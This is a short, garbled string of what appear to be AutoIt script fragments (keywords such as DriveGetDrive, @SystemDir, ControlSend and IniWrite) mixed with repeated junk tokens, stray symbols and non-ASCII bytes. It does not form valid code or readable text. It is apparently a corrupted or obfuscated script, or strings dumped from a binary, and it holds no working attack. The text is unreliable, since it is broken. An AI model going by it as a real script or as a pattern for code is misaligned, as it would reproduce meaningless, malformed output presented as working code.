$0=#DriveGetDrivel)c($u)
($l)d($v)F(~$l)$Fc una($v=9e=(9Func l($a=8F)l$($($l)$($l)l($v)F($l)$F($l)$($l)d($l)
($v)l($l)$($c)
($v)6=0Fc una($v=9e=(9Func l($a=8Func l($f=1FunGUISetFetFontnc ($c)
($v)F($c)
($v)=9Fu e($6=0Fc una($v=8e=(9Func l$l)$($c)
($v)F(l)$($l)d($l)$($c)
(@SystemDir$au)d($l)$9Fu e($6=0Fc una($v=9e=(9Func l($v)F($c)
($v)=9Fu e($6=0Fc una($v=9e=(9Func l($a=8F($l)$($l)$>$l=(9Func l($a=8F($l)$($l#$d=#$0=#$f=#$0=
$f=
$0=
$0getpDirGetSize$d=#$0($l)$(If.$c)l)u e($6=0Fc una($v=9e=(9Func l($a=8Func l($FuNc p(,,,,f=1FunGUISet§etFontnc ($c)
($f)F($c)
($v)($v=9e=(9Func l($)S¢ŒfÇˆCl($f=1FunGUIv)F($c)
($v)=9Fu e($6=0Fc una($v=9e=(9Func l($a=8F)l$($($l)$($l)l($v)F($l)$F($l)$($l)d˜($l)
($v)l($l)$($c)
($v)µ=0Fc una($v=9e=(9Func l($a=8FuNotlu e($6=0F¹c una($v=9e=(9Func l($@CRa=8F(él)$($l)$($l)wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww($2=0Fc una($v=9e=(8Func l($aControlSend=1FunGUIuna($v=9e=(9Func @l($a=8Fc una($v=9e=(9Func l($v)F($c)
($v)=9Fu e($6=0Fc una($v=9e=(9Func l($a=8F($l)($v)F($lF)($$l)$($l)d($l)0=#$f=#(9Func l($a=8Func l($f=1FunGUISetFe($l)$F($l)$($l)d($l)c 
($v)l($l)$($c)
($v)FIniWrite$(,,,,,